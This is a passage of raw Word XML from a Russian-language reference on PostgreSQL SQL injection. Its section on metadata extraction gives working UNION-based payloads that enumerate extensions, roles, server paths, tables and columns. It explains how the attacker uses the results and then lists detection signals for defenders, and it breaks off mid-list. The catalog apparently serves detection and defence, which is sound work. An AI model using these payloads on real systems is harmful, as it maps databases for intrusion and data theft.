        <w:t xml:space="preserve"> 3.1.1, 3.1.2 (подготовительные шаги), 3.1.4 (метаданные через тот же канал), 3.10.1 (через IN-list можно протащить data-modifying CTE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1EAF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Documentation: Combining Queries; Row and Array Comparisons — IN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2EC8C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.4 Извлечение метаданных через UNION + `pg_class` / `pg_namespace`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D85AF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNION-канал, направленный не на пользовательские данные, а на системные каталоги, снимает структуру всех schemas БД за один запрос. По сравнению с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, обращение к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую быстрее и видит больше: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это набор views поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с фильтрами по правам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15264C10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая UNION-точка из 3.1.1 или 3.1.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940BA3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все варианты предполагают точку входа из 3.1.1 или 3.1.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43356105" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перечисление установленных расширений — критически важная разведка, потому что определяет, какие категории атак вообще применимы (3.6 OOB через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 3.7.2 RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7D2C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0 UNION SELECT extname::text, extversion::text, NULL FROM pg_extension--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD436D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT id, name, price FROM products WHERE id = 0 UNION SELECT extname::text, extversion::text, NULL FROM pg_extension--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD09C9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ответе — список всех </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на текущей БД с версиями. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен PUBLIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50152227" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перечисление ролей и их атрибутов (без хешей паролей — это поле скрыто в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'********'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, в отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC1A51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0 UNION SELECT rolname::text, rolsuper::text, rolcanlogin::text FROM pg_roles--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121A81B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Возвращает имена всех ролей в кластере, кто суперюзер, кто может логиниться. Готовая мишень-карта для password spray или для прицельной эксплуатации под нужной ролью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE7590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Утечка конфигурации сервера — пути на ФС, имя ОС-пользователя, версия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020DE5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0 UNION SELECT name::text, setting::text, NULL FROM pg_settings WHERE name IN ('data_directory', 'log_directory', 'unix_socket_directories', 'ssl_cert_file')--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF99CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эти параметры доступны для чтения PUBLIC. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основное место хранения файлов БД, нужен для последующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('PG_VERSION', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и аналогичных атак из 3.6.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC75FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Все таблицы во всех схемах, кроме системных — основа для прицельных extraction-запросов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000731F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0 UNION SELECT n.nspname::text, c.relname::text, NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13CBE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25817512" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274FE17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE c.relkind = 'r' AND n.nspname NOT IN ('pg_catalog', 'information_schema')--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44AE4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Все колонки конкретной таблицы — после того как имя выбрано из предыдущего payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF497E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0 UNION SELECT a.attname::text, format_type(a.atttypid, a.atttypmod)::text, NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77131CDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_attribute a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33477666" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE a.attrelid = 'public.users'::regclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795E35F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND a.attnum &gt; 0 AND NOT a.attisdropped--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4095D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> За один HTTP-запрос атакующий получает полную карту доступной для application-роли схемы БД — имена таблиц, колонок, типы. Дальше идёт прицельный extraction-запрос по полученным именам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C058C1"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pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хранит все relations (таблицы, индексы, sequences, materialized views, foreign tables); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — schemas; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — колонки. Чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</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pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступно роли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию — это документированное поведение, на нём держится работа ORM, миграционных тулов, мониторинга. Хеши паролей лежат в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (и его view </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), читать его может только суперюзер; в публичном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поле паролей маскируется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'********'</w:t>
      </w:r>
      <w:r>
        <w:t>. Поэтому при инъекции в обычную application-роль перечислить ролей можно, а вытащить хеши — нельзя. Это меняет цель разведки: вместо credentials добывается карта инфраструктуры (расширения, схемы, пути) для следующего шага по цепочке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219B82F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</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pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только суперюзер. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступно всегда любому пользователю, но возвращает только объекты, на которые у роли есть какие-либо права.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBB545" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Запросы к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — повседневный инструмент: миграционные тулы (Alembic, Flyway), schema introspection в ORM, мониторинг, psql, pgAdmin. Сам факт обращения к pg_catalog ничего не значит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25FBDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C71C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ... FROM pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из application-роли, у которой нет миграционной задачи. Application-сервер в стационарном режиме за этим расширением никогда не лезет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4C790" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ... FROM pg_settings WHERE name IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с whitelist путей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unix_socket_directories</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
